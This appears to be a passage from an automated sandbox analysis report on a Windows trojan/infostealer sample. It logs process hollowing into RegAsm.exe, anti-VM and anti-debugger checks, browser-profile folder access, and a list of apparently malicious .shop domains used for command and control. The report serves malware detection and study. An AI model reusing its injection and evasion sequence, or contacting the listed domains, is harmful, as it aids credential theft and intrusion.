      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004256502_2_00425650
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00422E102_2_00422E10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403EF02_2_00403EF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004396B02_2_004396B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401F602_2_00401F60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004087E02_2_004087E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D7F12_2_0041D7F1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409920 appears 135 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409230 appears 44 times
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: String function: 00F9B8C0 appears 54 times
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 304
      Source: qeUaxJCA3FO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@2/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D116 CoCreateInstance,2_2_0042D116
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7528
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\bc7dfa7b-6102-4db8-83b1-a22c88c072a7Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: qeUaxJCA3FO.exeReversingLabs: Detection: 57%
      Source: unknownProcess created: C:\Users\user\Desktop\qeUaxJCA3FO.exe "C:\Users\user\Desktop\qeUaxJCA3FO.exe"
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 304
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: qeUaxJCA3FO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: qeUaxJCA3FO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: qeUaxJCA3FO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: qeUaxJCA3FO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: qeUaxJCA3FO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: qeUaxJCA3FO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: qeUaxJCA3FO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F9B288 push ecx; ret 0_2_00F9B29B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00440A46 push ss; ret 2_2_00440A56
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004413C4 push cs; retf 2_2_004413C5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00440484 push cs; retf 2_2_00440749
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004405EC push cs; retf 2_2_00440749
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004405F1 push cs; retf 2_2_00440749
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004405F3 push cs; retf 2_2_00440749
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7604Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FAF7AE FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00FAF7AE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBna
      Source: Amcache.hve.5.drBinary or memory string: VMware
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
      Source: RegAsm.exe, 00000002.00000002.1768091820.00000000013E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: RegAsm.exe, 00000002.00000002.1768091820.0000000001419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00437520 LdrInitializeThunk,2_2_00437520
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA2C23 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FA2C23
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA9B12 mov eax, dword ptr fs:[00000030h]0_2_00FA9B12
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA69CE mov ecx, dword ptr fs:[00000030h]0_2_00FA69CE
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA9B56 mov eax, dword ptr fs:[00000030h]0_2_00FA9B56
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FB2E46 GetProcessHeap,0_2_00FB2E46
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F9B905 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F9B905
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00FA2C23 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FA2C23
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F9B69A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F9B69A
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F9B7F6 SetUnhandledExceptionFilter,0_2_00F9B7F6

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_0287018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0287018D
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: benchillppwo.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: publicitttyps.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: answerrsdo.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: radiationnopp.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: affecthorsedpo.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: bargainnykwo.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: bannngwko.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: bouncedgowp.shop
      Source: qeUaxJCA3FO.exe, 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: bitchsafettyudjwu.shop
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11DB008Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F9B380 cpuid 0_2_00F9B380
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetLocaleInfoW,0_2_00FB28E6
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: EnumSystemLocalesW,0_2_00FA89E6
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00FB2280
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00FB2A0F
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00FB2BE4
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetLocaleInfoW,0_2_00FB2B15
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetLocaleInfoW,0_2_00FB247B
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: EnumSystemLocalesW,0_2_00FB256D
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: EnumSystemLocalesW,0_2_00FB2522
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00FB2693
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: EnumSystemLocalesW,0_2_00FB2608
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: GetLocaleInfoW,0_2_00FA8F4C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
